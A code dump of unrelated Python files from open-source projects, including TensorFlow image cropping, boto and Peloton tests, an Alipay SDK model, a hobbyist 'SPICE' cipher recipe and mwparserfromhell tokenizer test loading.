img = render_objects_fn(*args, **kwargs)
img *= 255.0
img = tf.cast(img, tf.uint8)
img.set_shape((None, None, kwargs['out_channels']))
return img
def extract_glimpse(image, pose_label, orig_im_ht, orig_im_wd,
out_side, pad_ratio, parts_keep):
# pose label is a [3x16xn,] vector
# for now just take the first pose and crop out the human
with tf.name_scope('ExtractGlimpse'):
pose_label = pose_label[:16*3]
pose_label = tf.reshape(pose_label, [16, 3])
if len(parts_keep) > 0:
pose_label = tf.gather(pose_label, parts_keep)
if len(parts_keep) == 1:
# now only one point, but need at least two to make a crop region
delta = tf.to_int64(
[tf.to_float(tf.shape(image)[-2]) * 0.1,
tf.to_float(tf.shape(image)[-3]) * 0.1, 0])
pose_label = tf.stack([
pose_label[0] - delta, pose_label[0] + delta])
pose_label_x = tf.to_float(pose_label[:, 0]) * \
tf.to_float(tf.shape(image)[-2]) / tf.to_float(orig_im_wd)
pose_label_y = tf.to_float(pose_label[:, 1]) * \
tf.to_float(tf.shape(image)[-3]) / tf.to_float(orig_im_ht)
pose_label = tf.stack([pose_label_y, pose_label_x])
mx_pts = tf.to_int32(tf.reduce_max(pose_label, axis=1))
mn_pts = tf.to_int32(tf.reduce_min(
tf.where(tf.greater_equal(pose_label, 0), pose_label,
tf.ones(pose_label.get_shape()) * 999999), axis=1))
delta_0 = tf.to_int32(tf.to_float((mx_pts[0] - mn_pts[0])) * pad_ratio)
delta_1 = tf.to_int32(tf.to_float((mx_pts[1] - mn_pts[1])) * pad_ratio)
mx_pts = mx_pts + [delta_0, delta_1]
mn_pts = mn_pts - [delta_0, delta_1]
offset_ht = tf.maximum(mn_pts[0], 0)
offset_wd = tf.maximum(mn_pts[1], 0)
target_ht = tf.minimum(mx_pts[0]-offset_ht, tf.shape(image)[-3]-offset_ht-1)
target_wd = tf.minimum(mx_pts[1]-offset_wd, tf.shape(image)[-2]-offset_wd-1)
# image = tf.Print(image, [offset_ht, offset_wd, target_ht, target_wd,
# tf.shape(image)], "stuff:")
image = tf.cond(tf.logical_and(
tf.greater(mx_pts[1], mn_pts[1]),
tf.greater(mx_pts[0], mn_pts[0])),
lambda: tf.image.crop_to_bounding_box(
image, offset_ht, offset_wd, target_ht, target_wd),
lambda: image)
if out_side > 0:
image = tf.image.resize_images(
image, [out_side, out_side])
return image
def read_sparse_label_fn(sparse_label, nclasses):
"""sparse_label is a string and return a 1D vector with the dense label
"""
res = np.zeros((nclasses,), dtype='int32')
res[np.array([int(el.split(':')[0]) for el in sparse_label.split(',')])] = \
np.array([int(el.split(':')[1]) for el in sparse_label.split(',')])
res[res < 0] = 0 # get rid of -1 label for now
return res
def read_sparse_label(*args):
return tf.py_func(read_sparse_label_fn, args, tf.int32)
|
graphene_sqlalchemy/resolvers.py | adrianschneider94/graphene-sqlalchemy | 947 | 12688122 | <reponame>adrianschneider94/graphene-sqlalchemy
from graphene.utils.get_unbound_function import get_unbound_function
def get_custom_resolver(obj_type, orm_field_name):
"""
Since `graphene` will call `resolve_<field_name>` on a field only if it
does not have a `resolver`, we need to re-implement that logic here so
users are able to override the default resolvers that we provide.
"""
resolver = getattr(obj_type, 'resolve_{}'.format(orm_field_name), None)
if resolver:
return get_unbound_function(resolver)
return None
def get_attr_resolver(obj_type, model_attr):
"""
In order to support field renaming via `ORMField.model_attr`,
we need to define resolver functions for each field.
:param SQLAlchemyObjectType obj_type:
:param str model_attr: the name of the SQLAlchemy attribute
:rtype: Callable
"""
return lambda root, _info: getattr(root, model_attr, None)
|
tests/clpy_tests/opencl_tests/headercvt_tests/test_headercvt_funcdecl.py | fixstars/clpy | 142 | 12688138 | import unittest
import headercvt_test_utils as util
class TestHeadercvtFuncDecl(unittest.TestCase):
def setUp(self):
util.check_existence_of_headercvt()
@util.with_temp_wd
def test_headercvt_funcdecl_accept_case(self, wd):
util.kick_headercvt_and_get_results(wd, """
void clSomeFunction(int, void *);
""")
self.assertTrue(util.compile_with(wd, "clSomeFunction(10, <void*>0)"))
@util.with_temp_wd
def test_headercvt_funcdecl_decline_case(self, wd):
results = util.kick_headercvt_and_get_results(wd, """
void SomeFunction(int, void *);
""")
self.assertTrue(not util.contains(
results["func_decl"], "SomeFunction"))
self.assertTrue(util.compile_with(wd, ""))
|
tests/unit/ec2/test_blockdevicemapping.py | mariocesar/boto | 5,079 | 12688170 | from tests.compat import unittest
from boto.ec2.connection import EC2Connection
from boto.ec2.blockdevicemapping import BlockDeviceType, BlockDeviceMapping
from tests.compat import OrderedDict
from tests.unit import AWSMockServiceTestCase
class BlockDeviceTypeTests(unittest.TestCase):
def setUp(self):
self.block_device_type = BlockDeviceType()
def check_that_attribute_has_been_set(self, name, value, attribute):
self.block_device_type.endElement(name, value, None)
self.assertEqual(getattr(self.block_device_type, attribute), value)
def test_endElement_sets_correct_attributes_with_values(self):
for arguments in [("volumeId", 1, "volume_id"),
("virtualName", "some name", "ephemeral_name"),
("snapshotId", 1, "snapshot_id"),
("volumeSize", 1, "size"),
("status", "some status", "status"),
("attachTime", 1, "attach_time"),
("somethingRandom", "somethingRandom", "somethingRandom")]:
self.check_that_attribute_has_been_set(arguments[0], arguments[1], arguments[2])
def test_endElement_with_name_NoDevice_value_true(self):
self.block_device_type.endElement("NoDevice", 'true', None)
self.assertEqual(self.block_device_type.no_device, True)
def test_endElement_with_name_NoDevice_value_other(self):
self.block_device_type.endElement("NoDevice", 'something else', None)
self.assertEqual(self.block_device_type.no_device, False)
def test_endElement_with_name_deleteOnTermination_value_true(self):
self.block_device_type.endElement("deleteOnTermination", "true", None)
self.assertEqual(self.block_device_type.delete_on_termination, True)
def test_endElement_with_name_deleteOnTermination_value_other(self):
self.block_device_type.endElement("deleteOnTermination", 'something else', None)
self.assertEqual(self.block_device_type.delete_on_termination, False)
def test_endElement_with_name_encrypted_value_true(self):
self.block_device_type.endElement("Encrypted", "true", None)
self.assertEqual(self.block_device_type.encrypted, True)
def test_endElement_with_name_Encrypted_value_other(self):
self.block_device_type.endElement("Encrypted", 'something else', None)
self.assertEqual(self.block_device_type.encrypted, False)
class BlockDeviceMappingTests(unittest.TestCase):
def setUp(self):
self.block_device_mapping = BlockDeviceMapping()
def block_device_type_eq(self, b1, b2):
if isinstance(b1, BlockDeviceType) and isinstance(b2, BlockDeviceType):
return all([b1.connection == b2.connection,
b1.ephemeral_name == b2.ephemeral_name,
b1.no_device == b2.no_device,
b1.volume_id == b2.volume_id,
b1.snapshot_id == b2.snapshot_id,
b1.status == b2.status,
b1.attach_time == b2.attach_time,
b1.delete_on_termination == b2.delete_on_termination,
b1.size == b2.size,
b1.encrypted == b2.encrypted])
def test_startElement_with_name_ebs_sets_and_returns_current_value(self):
retval = self.block_device_mapping.startElement("ebs", None, None)
assert self.block_device_type_eq(retval, BlockDeviceType(self.block_device_mapping))
def test_startElement_with_name_virtualName_sets_and_returns_current_value(self):
retval = self.block_device_mapping.startElement("virtualName", None, None)
assert self.block_device_type_eq(retval, BlockDeviceType(self.block_device_mapping))
def test_endElement_with_name_device_sets_current_name_dev_null(self):
self.block_device_mapping.endElement("device", "/dev/null", None)
self.assertEqual(self.block_device_mapping.current_name, "/dev/null")
def test_endElement_with_name_device_sets_current_name(self):
self.block_device_mapping.endElement("deviceName", "some device name", None)
self.assertEqual(self.block_device_mapping.current_name, "some device name")
def test_endElement_with_name_item_sets_current_name_key_to_current_value(self):
self.block_device_mapping.current_name = "some name"
self.block_device_mapping.current_value = "some value"
self.block_device_mapping.endElement("item", "some item", None)
self.assertEqual(self.block_device_mapping["some name"], "some value")
class TestLaunchConfiguration(AWSMockServiceTestCase):
connection_class = EC2Connection
def default_body(self):
# This is a dummy response
return b"""
<DescribeLaunchConfigurationsResponse>
</DescribeLaunchConfigurationsResponse>
"""
def test_run_instances_block_device_mapping(self):
# Same as the test in ``unit/ec2/autoscale/test_group.py:TestLaunchConfiguration``,
# but with modified request parameters (due to a mismatch between EC2 &
# Autoscaling).
self.set_http_response(status_code=200)
dev_sdf = BlockDeviceType(snapshot_id='snap-12345')
dev_sdg = BlockDeviceType(snapshot_id='snap-12346', delete_on_termination=True, encrypted=True)
class OrderedBlockDeviceMapping(OrderedDict, BlockDeviceMapping):
pass
bdm = OrderedBlockDeviceMapping()
bdm.update(OrderedDict((('/dev/sdf', dev_sdf), ('/dev/sdg', dev_sdg))))
response = self.service_connection.run_instances(
image_id='123456',
instance_type='m1.large',
security_groups=['group1', 'group2'],
block_device_map=bdm
)
self.assert_request_parameters({
'Action': 'RunInstances',
'BlockDeviceMapping.1.DeviceName': '/dev/sdf',
'BlockDeviceMapping.1.Ebs.DeleteOnTermination': 'false',
'BlockDeviceMapping.1.Ebs.SnapshotId': 'snap-12345',
'BlockDeviceMapping.2.DeviceName': '/dev/sdg',
'BlockDeviceMapping.2.Ebs.DeleteOnTermination': 'true',
'BlockDeviceMapping.2.Ebs.SnapshotId': 'snap-12346',
'BlockDeviceMapping.2.Ebs.Encrypted': 'true',
'ImageId': '123456',
'InstanceType': 'm1.large',
'MaxCount': 1,
'MinCount': 1,
'SecurityGroup.1': 'group1',
'SecurityGroup.2': 'group2',
}, ignore_params_values=[
'Version', 'AWSAccessKeyId', 'SignatureMethod', 'SignatureVersion',
'Timestamp'
])
if __name__ == "__main__":
unittest.main()
|
alipay/aop/api/domain/AlipaySecurityProdMygetQueryModel.py | antopen/alipay-sdk-python-all | 213 | 12688188 | <filename>alipay/aop/api/domain/AlipaySecurityProdMygetQueryModel.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ExtendParams import ExtendParams
class AlipaySecurityProdMygetQueryModel(object):
def __init__(self):
self._extend_params = None
self._phone = None
@property
def extend_params(self):
return self._extend_params
@extend_params.setter
def extend_params(self, value):
if isinstance(value, ExtendParams):
self._extend_params = value
else:
self._extend_params = ExtendParams.from_alipay_dict(value)
@property
def phone(self):
return self._phone
@phone.setter
def phone(self, value):
self._phone = value
def to_alipay_dict(self):
params = dict()
if self.extend_params:
if hasattr(self.extend_params, 'to_alipay_dict'):
params['extend_params'] = self.extend_params.to_alipay_dict()
else:
params['extend_params'] = self.extend_params
if self.phone:
if hasattr(self.phone, 'to_alipay_dict'):
params['phone'] = self.phone.to_alipay_dict()
else:
params['phone'] = self.phone
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipaySecurityProdMygetQueryModel()
if 'extend_params' in d:
o.extend_params = d['extend_params']
if 'phone' in d:
o.phone = d['phone']
return o
|
recipes/Python/572159_SPICE/recipe-572159.py | tdiprima/code | 2,023 | 12688189 | '''Module that implements SPICE.
This module provides access to a standardized implementation
of SPICE (Stephen's Power-Inspired, Computerized Encryption).'''
################################################################################
__version__ = '$Revision: 0 $'
__date__ = 'April 19, 2008'
__author__ = 'Stephen "Zero" Chappell <<EMAIL>>'
__credits__ = '''\
<NAME>, for testing code that led to this module.
<NAME>, for contributing to the random module.
<NAME>, for adding support for two core generators.'''
################################################################################
import random as _random
import sys as _sys
################################################################################
def crypt_major():
'Create a new Major Key.'
return ''.join(map(chr, _crypt.sample(xrange(256), 256)))
def crypt_minor():
'Create a new Minor Key.'
sample = _crypt.sample(range(4) * 64, 256)
array = []
for index in xrange(64):
bits_12 = sample[index * 4] << 6
bits_34 = sample[index * 4 + 1] << 4
bits_56 = sample[index * 4 + 2] << 2
bits_78 = sample[index * 4 + 3]
array.append(bits_12 + bits_34 + bits_56 + bits_78)
return ''.join(map(chr, array))
################################################################################
def named_major(name):
'Create a named Major Key.'
_namer.seed(name)
return ''.join(map(chr, _namer.sample(xrange(256), 256)))
def named_minor(name):
'Create a named Minor Key.'
_namer.seed(name)
sample = _namer.sample(range(4) * 64, 256)
array = []
for index in xrange(64):
bits_12 = sample[index * 4] << 6
bits_34 = sample[index * 4 + 1] << 4
bits_56 = sample[index * 4 + 2] << 2
bits_78 = sample[index * 4 + 3]
array.append(bits_12 + bits_34 + bits_56 + bits_78)
return ''.join(map(chr, array))
################################################################################
def encode_string(string, major, minor):
'Return an encrypted string.'
assert isinstance(string, str)
_check_major(major)
_check_minor(minor)
map_1 = _encode_map_1(major)
map_2 = _encode_map_2(minor)
return _encode(string, map_1, map_2)
def decode_string(string, major, minor):
'Return a decrypted string.'
assert isinstance(string, str) and len(string) % 4 == 0
_check_major(major)
_check_minor(minor)
map_1 = _decode_map_1(minor)
map_2 = _decode_map_2(major)
return _decode(string, map_1, map_2)
################################################################################
def encode_file(source, destination, major, minor):
'Encrypt a file from source to destination.'
_check_major(major)
_check_minor(minor)
map_1 = _encode_map_1(major)
map_2 = _encode_map_2(minor)
string = source.read(2 ** 20 / 5)
while string:
destination.write(_encode(string, map_1, map_2))
string = source.read(2 ** 20 / 5)
def decode_file(source, destination, major, minor):
'Decrypt a file from source to destination.'
_check_major(major)
_check_minor(minor)
map_1 = _decode_map_1(minor)
map_2 = _decode_map_2(major)
string = source.read(2 ** 20 / 5 * 4)
while string:
tail_len = len(string) % 4
if tail_len == 0:
destination.write(_decode(string, map_1, map_2))
string = source.read(2 ** 20 / 5 * 4)
else:
destination.write(_decode(string[:-tail_len], map_1, map_2))
return string[-tail_len:]
return ''
################################################################################
class File_Crypt:
'File_Crypt(major, minor, name, mode) -> File_Crypt'
def __init__(self, major, minor, name, mode):
'Initialize the File_Crypt object.'
_check_major(major)
_check_minor(minor)
self.__em1 = _encode_map_1(major)
self.__em2 = _encode_map_2(minor)
self.__dm1 = _decode_map_1(minor)
self.__dm2 = _decode_map_2(major)
assert len(mode) == 1 and mode in 'raw'
self.__file = open(name, mode + 'b', 0)
self.tail = ''
def read(self, size=-1):
'Read and decrypt from file.'
string = self.__file.read(size * 4)
tail_len = len(string) % 4
if tail_len:
self.tail = string[-tail_len:]
return _decode(string[:-tail_len], self.__dm1, self.__dm2)
else:
return _decode(string, self.__dm1, self.__dm2)
def write(self, string):
'Encrypt and write to file.'
self.__file.write(_encode(string, self.__em1, self.__em2))
def seek(self, offset, whence=0):
'Seek to virtual positon in file.'
self.__file.seek(offset * 4, whence)
offset = self.__file.tell() / 4
self.__file.seek(offset * 4)
def tell(self):
'Return the virtual position in file.'
return self.__file.tell() / 4
def close(self):
'Close the File_Crypt object.'
self.__file.close()
################################################################################
class Socket_Crypt:
'Socket_Crypt(major, minor, socket) -> Socket_Crypt'
def __init__(self, major, minor, socket):
'Initialize the Socket_Crypt object.'
_check_major(major)
_check_minor(minor)
self.__em1 = _encode_map_1(major)
self.__em2 = _encode_map_2(minor)
self.__dm1 = _decode_map_1(minor)
self.__dm2 = _decode_map_2(major)
self.__major = major
self.__minor = minor
self.__socket = socket
self.__tail = ''
self.__tails = {}
def accept(self):
'Return a new Socket_Crypt and address.'
conn, address = self.__socket.accept()
return Socket_Crypt(self.__major, self.__minor, conn), address
def recv(self, size, flags=0):
'Receive and decrypt off socket.'
string = self.__tail + self.__socket.recv(size * 4, flags)
tail_len = len(string) % 4
if tail_len:
self.__tail = string[-tail_len:]
return _decode(string[:-tail_len], self.__dm1, self.__dm2)
else:
self.__tail = ''
return _decode(string, self.__dm1, self.__dm2)
def recvfrom(self, size, flags=0):
'Receive datagram and decrypt off socket.'
string, address = self.__socket.recvfrom(size * 4, flags)
string = self.__tails.get(address, '') + string
tail_len = len(string) % 4
if tail_len:
self.__tails[address] = string[-tail_len:]
string = _decode(string[:-tail_len], self.__dm1, self.__dm2)
return string, address
else:
if address in self.__tails:
del self.__tails[address]
string = _decode(string, self.__dm1, self.__dm2)
return string, address
def send(self, string, flags=0):
'Encrypt and send on socket.'
string = _encode(string, self.__em1, self.__em2)
sent = self.__socket.send(string, flags)
offset = sent % 4
if offset:
string = string[sent:][:4-offset]
sent += len(string)
while string:
string = string[self.__socket.send(string, flags):]
return sent / 4
def sendall(self, string, flags=0):
'Encrypt and send all on socket.'
string = _encode(string, self.__em1, self.__em2)
return self.__socket.sendall(string, flags)
def sendto(self, string, address, flags=0):
'Encrypt and send datagram on socket.'
string = _encode(string, self.__em1, self.__em2)
sent = self.__socket.sendto(string, flags, address)
offset = sent % 4
if offset:
string = string[sent:][:4-offset]
sent += len(string)
while string:
string = string[self.socket.sentto(string, flags, address):]
return sent / 4
def makefile(self, mode='r', bufsize=-1):
'Return a file-like object.'
return self
def read(self, size=-1):
'Read and decrypt from socket.'
if size < 0:
cache = ''
while True:
temp = self.recv(2 ** 10)
if temp:
cache += temp
else:
return cache
else:
return self.recv(size)
def readline(self, size=-1):
'Dummy attribute for cPickle.'
raise NotImplementedError
def write(self, string):
'Encrypt and write to socket.'
self.sendall(string)
################################################################################
class String_Crypt:
'String_Crypt(major, minor) -> String_Crypt'
def __init__(self, major, minor):
'Initialize the String_Crypt object.'
_check_major(major)
_check_minor(minor)
self.__em1 = _encode_map_1(major)
self.__em2 = _encode_map_2(minor)
self.__dm1 = _decode_map_1(minor)
self.__dm2 = _decode_map_2(major)
def encode(self, string):
'Return an encrypted string.'
assert isinstance(string, str)
return _encode(string, self.__em1, self.__em2)
def decode(self, string):
'Return a decrypted string.'
assert isinstance(string, str) and len(string) % 4 == 0
return _decode(string, self.__dm1, self.__dm2)
################################################################################
_crypt = _random.SystemRandom()
_namer = _random.Random()
################################################################################
def _check_major(key):
'Private module function.'
assert isinstance(key, str) and len(key) == 256
for character in map(chr, xrange(256)):
assert character in key
def _check_minor(key):
'Private module function.'
assert isinstance(key, str) and len(key) == 64
indexs = []
for byte in map(ord, key):
for shift in xrange(6, -2, -2):
indexs.append((byte >> shift) & 3)
for index in xrange(4):
assert indexs.count(index) == 64
def _encode_map_1(major):
'Private module function.'
return map(ord, major)
def _encode_map_2(minor):
'Private module function.'
map_2 = [[], [], [], []]
array = []
for byte in map(ord, minor):
for shift in xrange(6, -2, -2):
array.append((byte >> shift) & 3)
for byte, index in enumerate(array):
map_2[index].append(chr(byte))
return map_2
def _decode_map_1(minor):
'Private module function.'
map_1 = []
for byte in map(ord, minor):
for shift in xrange(6, -2, -2):
map_1.append((byte >> shift) & 3)
return map_1
def _decode_map_2(major):
'Private module function.'
map_2 = [None] * 256
for byte, index in enumerate(map(ord, major)):
map_2[index] = chr(byte)
return map_2
def _encode(string, map_1, map_2):
'Private module function.'
cache = ''
for character in string:
byte = map_1[ord(character)]
for shift in xrange(6, -2, -2):
cache += map_2[(byte >> shift) & 3][_crypt.randrange(64)]
return cache
def _decode(string, map_1, map_2):
'Private module function.'
cache = ''
iterator = iter(string)
for byte in iterator:
bits_12 = map_1[ord(byte)] << 6
bits_34 = map_1[ord(iterator.next())] << 4
bits_56 = map_1[ord(iterator.next())] << 2
bits_78 = map_1[ord(iterator.next())]
cache += map_2[bits_12 + bits_34 + bits_56 + bits_78]
return cache
################################################################################
if __name__ == '__main__':
_sys.stdout.write('Content-Type: text/plain\n\n')
_sys.stdout.write(file(_sys.argv[0]).read())
|
laika_repo/tests/test_ephemerides.py | JoeOIVOV/ArnePilot | 116 | 12688245 | import numpy as np
import unittest
from laika.gps_time import GPSTime
from laika import AstroDog
gps_times_list = [[1950, 415621.0],
[1895, 455457.0],
[1885, 443787.0]]
svIds = ['G01', 'G31', 'R08']
gps_times = [GPSTime(*gps_time_list) for gps_time_list in gps_times_list]
class TestAstroDog(unittest.TestCase):
'''
def test_nav_vs_orbit_now(self):
dog_orbit = AstroDog(pull_orbit=True)
dog_nav = AstroDog(pull_orbit=False)
gps_time = GPSTime.from_datetime(datetime.utcnow()) - SECS_IN_DAY*2
for svId in svIds:
sat_info_nav = dog_nav.get_sat_info(svId, gps_time)
sat_info_orbit = dog_orbit.get_sat_info(svId, gps_time)
np.testing.assert_allclose(sat_info_nav[0], sat_info_orbit[0], rtol=0, atol=5)
np.testing.assert_allclose(sat_info_nav[1], sat_info_orbit[1], rtol=0, atol=.1)
np.testing.assert_allclose(sat_info_nav[2], sat_info_orbit[2], rtol=0, atol=1e-7)
np.testing.assert_allclose(sat_info_nav[3], sat_info_orbit[3], rtol=0, atol=1e-11)
'''
def test_nav_vs_orbit__old(self):
dog_orbit = AstroDog(pull_orbit=True)
dog_nav = AstroDog(pull_orbit=False)
for gps_time in gps_times:
for svId in svIds:
sat_info_nav = dog_nav.get_sat_info(svId, gps_time)
sat_info_orbit = dog_orbit.get_sat_info(svId, gps_time)
np.testing.assert_allclose(sat_info_nav[0], sat_info_orbit[0], rtol=0, atol=5)
np.testing.assert_allclose(sat_info_nav[1], sat_info_orbit[1], rtol=0, atol=.1)
np.testing.assert_allclose(sat_info_nav[2], sat_info_orbit[2], rtol=0, atol=1e-7)
np.testing.assert_allclose(sat_info_nav[3], sat_info_orbit[3], rtol=0, atol=1e-11)
if __name__ == "__main__":
unittest.main()
|
MACS3/Utilities/Constants.py | bgruening/MACS | 357 | 12688257 | MACS_VERSION = "3.0.0a7"
MAX_PAIRNUM = 1000
MAX_LAMBDA = 100000
FESTEP = 20
BUFFER_SIZE = 100000 # np array will increase at step of 1 million items
READ_BUFFER_SIZE = 10000000 # 10M bytes for read buffer size
N_MP = 2 # Number of processers
|
Misc/Cleaner/Clean.py | awesome-archive/ReadableWebProxy | 193 | 12688275 |
import common.database as db
import common.util.urlFuncs as urlFuncs
import logging
import os.path
import settings
class Clean(object):
def __init__(self):
print("Clean __init__()")
self.log = logging.getLogger("Main.Cleaner")
super().__init__()
def clean_files(self):
with db.session_context() as sess:
q = sess.query(db.WebFiles) \
.filter(db.WebFiles.fspath != None)
self.log.info("Querying for non-null filepaths...")
have = q.all()
self.log.info("Have %s local files.", len(have))
count = 0
for file in have:
fpath = os.path.join(settings.RESOURCE_DIR, file.fspath)
if not os.path.exists(fpath):
self.log.error("Missing file: %s", fpath)
count += 1
if count % 1000 == 0:
self.log.info("Scanned %s files.", count)
|
tests/integration/misc_test/test_host_maintenance.py | bopopescu/peloton | 617 | 12688278 | import logging
import pytest
import time
from tests.integration.host import (
get_host_in_state,
wait_for_host_state,
is_host_in_state,
draining_period_sec,
)
from peloton_client.pbgen.peloton.api.v0.host import host_pb2 as hpb
from peloton_client.pbgen.peloton.api.v0.task import task_pb2 as task
pytestmark = [
pytest.mark.default,
pytest.mark.preemption,
pytest.mark.random_order(disabled=True),
]
log = logging.getLogger(__name__)
# Tests task kill due to host maintenance with the following scenario
# 1. Create a job (with 4 instances) with host affinity constraint (say host A)
# All 4 instances should transition to RUNNING
# 2. Start Peloton host maintenance on the host A:
# The host draining kicks in and the tasks on host A should be killed in
# the next host draining cycle. The tasks should transition to PENDING as
# host A is DRAINING and there should be no further scheduling on it.
def test__start_maintenance_kill_tasks(host_affinity_job, maintenance):
# Pick a host that is UP and start maintenance on it
test_host = get_host_in_state(hpb.HOST_STATE_UP)
# Set host affinity of the job to the selected host
host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value = (
test_host
)
host_affinity_job.create()
host_affinity_job.wait_for_state(goal_state="RUNNING")
def all_running():
return all(
t.state == task.RUNNING
for t in host_affinity_job.get_tasks().values()
)
host_affinity_job.wait_for_condition(all_running)
constraint = host_affinity_job.job_config.defaultConfig.constraint
test_host = constraint.labelConstraint.label.value
resp = maintenance["start"]([test_host])
assert resp
def all_pending():
return all(
t.state == task.PENDING
for t in host_affinity_job.get_tasks().values()
)
# Wait for tasks to be killed and restarted
host_affinity_job.wait_for_condition(all_pending)
# Tests a typical host lifecycle. The scenario is as follows
# 1. Select a host in UP state.
# 2. Start Peloton host maintenance on host A:
# a. Host A should immediately transition to DRAINING.
# b. Host A should transition to DOWN, latest in the next host draining
# cycle.
# 3. Complete Maintenance on host A:
# Host A should not longer be DOWN. It should transition to UP
def test__host_maintenance_lifecycle(host_affinity_job, maintenance):
# Pick a host that is UP and start maintenance on it
test_host = get_host_in_state(hpb.HOST_STATE_UP)
# Set host affinity of the job to the selected host
host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value = (
test_host
)
host_affinity_job.create()
# Start maintenance on the selected host
resp = maintenance["start"]([test_host])
assert resp
# Wait for host to transition to DOWN
wait_for_host_state(test_host, hpb.HOST_STATE_DOWN)
# Complete maintenance on the test hosts
resp = maintenance["stop"]([test_host])
assert resp
# Host should no longer be DOWN
assert not is_host_in_state(test_host, hpb.HOST_STATE_DOWN)
wait_for_host_state(test_host, hpb.HOST_STATE_UP)
# Tests the resumption of draining process on resmgr recovery. The scenario is
# as follows:
# 1. Select a host in UP state:
# 2. Start Peloton host maintenance on host A.
# 3. Restart resmgr: Before restarting resmgr, jobmgr is stopped to ensure
# preemption queue is not polled. On resmgr recovery, the
# draining process should resume and host should transition
# to DOWN
def test__host_draining_resumes_on_resmgr_recovery(
host_affinity_job,
maintenance,
jobmgr,
resmgr,
):
# Pick a host that is UP and start maintenance on it
test_host = get_host_in_state(hpb.HOST_STATE_UP)
# Set host affinity of the job to the selected host
host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value = (
test_host
)
host_affinity_job.create()
def all_running():
return all(
t.state == task.RUNNING
for t in host_affinity_job.get_tasks().values()
)
host_affinity_job.wait_for_condition(all_running)
constraint = host_affinity_job.job_config.defaultConfig.constraint
test_host = constraint.labelConstraint.label.value
resp = maintenance["start"]([test_host])
assert resp
# Stop jobmgr to ensure tasks are not killed
jobmgr.stop()
# Sleep for one draining period to ensure maintenance queue is polled
time.sleep(draining_period_sec)
resmgr.restart()
jobmgr.start()
# Wait for host to transition to DOWN
wait_for_host_state(test_host, hpb.HOST_STATE_DOWN)
# Tests the resumption of draining process on resmgr recovery. The scenario is
# as follows:
# 1. Select a host in UP state:
# 2. Start Peloton host maintenance on host A.
# 3. Restart hostmgr: Before restarting hostmgr, resmgr is stopped to ensure
# maintenance queue is not polled. On hostmgr recovery, the
# draining process should resume and host should transition
# to DOWN
def test__host_draining_resumes_on_hostmgr_recovery(
host_affinity_job,
maintenance,
resmgr,
hostmgr,
):
# Pick a host that is UP and start maintenance on it
test_host = get_host_in_state(hpb.HOST_STATE_UP)
# Set host affinity of the job to the selected host
host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value = (
test_host
)
host_affinity_job.create()
def all_running():
return all(
t.state == task.RUNNING
for t in host_affinity_job.get_tasks().values()
)
host_affinity_job.wait_for_condition(all_running)
constraint = host_affinity_job.job_config.defaultConfig.constraint
test_host = constraint.labelConstraint.label.value
# Stop resmgr to ensure maintenance queue is not polled
resmgr.stop()
resp = maintenance["start"]([test_host])
assert resp
hostmgr.restart()
resmgr.start()
# Wait for host to transition to DOWN
wait_for_host_state(test_host, hpb.HOST_STATE_DOWN)
|
tests/test_tokenizer.py | legoktm/mwparserfromhell | 481 | 12688292 | # Copyright (C) 2012-2016 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import codecs
from os import listdir, path
import warnings
import pytest
from mwparserfromhell.parser import contexts, tokens
from mwparserfromhell.parser.builder import Builder
from mwparserfromhell.parser.tokenizer import Tokenizer as PyTokenizer
try:
from mwparserfromhell.parser._tokenizer import CTokenizer
except ImportError:
CTokenizer = None
class _TestParseError(Exception):
"""Raised internally when a test could not be parsed."""
def _parse_test(test, data):
"""Parse an individual *test*, storing its info in *data*."""
for line in test.strip().splitlines():
if line.startswith("name:"):
data["name"] = line[len("name:") :].strip()
elif line.startswith("label:"):
data["label"] = line[len("label:") :].strip()
elif line.startswith("input:"):
raw = line[len("input:") :].strip()
if raw[0] == '"' and raw[-1] == '"':
raw = raw[1:-1]
raw = raw.encode("raw_unicode_escape")
data["input"] = raw.decode("unicode_escape")
elif line.startswith("output:"):
raw = line[len("output:") :].strip()
try:
data["output"] = eval(raw, vars(tokens))
except Exception as err:
raise _TestParseError(err) from err
def _load_tests(filename, name, text):
"""Load all tests in *text* from the file *filename*."""
tests = text.split("\n---\n")
for test in tests:
data = {"name": None, "label": None, "input": None, "output": None}
try:
_parse_test(test, data)
except _TestParseError as err:
if data["name"]:
error = "Could not parse test '{0}' in '{1}':\n\t{2}"
warnings.warn(error.format(data["name"], filename, err))
else:
error = "Could not parse a test in '{0}':\n\t{1}"
warnings.warn(error.format(filename, err))
continue
if not data["name"]:
error = "A test in '{0}' was ignored because it lacked a name"
warnings.warn(error.format(filename))
continue
if data["input"] is None or data["output"] is None:
error = (
"Test '{}' in '{}' was ignored because it lacked an input or an output"
)
warnings.warn(error.format(data["name"], filename))
continue
# Include test filename in name
data["name"] = "{}:{}".format(name, data["name"])
yield data
def build():
"""Load and install all tests from the 'tokenizer' directory."""
directory = path.join(path.dirname(__file__), "tokenizer")
extension = ".mwtest"
for filename in listdir(directory):
if not filename.endswith(extension):
continue
fullname = path.join(directory, filename)
with codecs.open(fullname, "r", encoding="utf8") as fp:
text = fp.read()
name = path.split(fullname)[1][: -len(extension)]
yield from _load_tests(fullname, name, text)
@pytest.mark.parametrize(
"tokenizer",
filter(None, (CTokenizer, PyTokenizer)),
